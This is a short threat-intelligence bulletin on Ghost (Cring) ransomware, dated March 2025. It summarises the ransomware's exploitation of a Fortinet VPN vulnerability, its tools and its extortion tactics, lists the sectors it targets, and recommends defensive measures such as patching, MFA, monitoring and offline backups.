CGI Weekly

Cyber Guardian Threat Intel: Ghost Ransomware continues to evolve and target edge devices.

Date: March 11, 2025

Threat Level: High

Executive Summary:

The Ghost Ransomware—also known as Cring—has surged in prominence over the past week following a joint advisory by CISA and the FBI. The malware is responsible for breaching organizations across 70 countries, exploiting Fortinet VPN vulnerabilities and other edge devices with weak security postures, particularly in critical infrastructure sectors. This ransomware variant is not new but has evolved with advanced evasion techniques and targeted attacks on industries with limited cybersecurity resources.

Technical Overview:

Ghost ransomware attacks are highly targeted and sophisticated, leveraging the following tactics and techniques:

• Initial Access:
  Exploits unpatched vulnerabilities in Fortinet FortiGate VPN devices (CVE-2018-13379) to gain access. In some cases, Microsoft Exchange Server vulnerabilities are also targeted.
• Persistence & Lateral Movement:
  Uses PowerShell scripts, certutil, and Cobalt Strike for further network infiltration and persistence.
• Encryption & Extortion:
• Data encryption using AES-256 and RSA-4096 algorithms.
• Exfiltrates sensitive data for double extortion—threatening to leak data if the ransom isn’t paid.
• Ransom notes demand payments in Bitcoin, typically ranging between $50,000 - $1 million, depending on the victim.

Industries & Sectors Targeted

• Critical Infrastructure (Utilities, Energy)
• Healthcare and Pharmaceuticals
• Manufacturing
• Government Agencies
• Education Institutions
• Religious Organizations
• Small-to-Medium Enterprises (SMEs)

Geographic Impact

Ghost ransomware incidents have been reported in over 70 countries, with heavy targeting in Europe, North America, and parts of Asia.

Recommendations:

Patch Immediately

• Apply updates for Fortinet VPN appliances (CVE-2018-13379).
• Patch Microsoft Exchange Servers and all externally facing systems.

Enforce Strong Authentication

• Enable MFA for all users, especially remote access services.

Monitor for Suspicious Behavior

• Watch for anomalous PowerShell execution.
• Scan for known malicious IPs and domains.
• Implement EDR/XDR solutions to detect and contain intrusions.

Network Segmentation & Least Privilege

• Isolate critical systems and reduce user privileges.

Backup & Recovery

• Maintain offline, tested backups.
• Verify integrity frequently.

Incident Response Plan

• Make sure your Incident Response Plan is up to date and conduct tabletop exercises based on Ghost/Cring attack scenarios.

Key Takeaways

• Ghost Ransomware has reemerged as a serious global threat in 2025, using highly targeted campaigns and exploiting known, unpatched vulnerabilities.
• Victims are coerced through double extortion tactics, amplifying the damage of an already devastating attack.
• The rapid deployment of the ransomware following initial compromise, coupled with the group's indiscriminate targeting across various sectors and geographies, makes Ghost (Cring) a particularly dangerous adversary.
• Timely patching, proactive monitoring/threat hunting, and staying informed will help with defending.
  
  

Cyber Guardian Intelligence - Intel Driven Defense, Always One Step Ahead.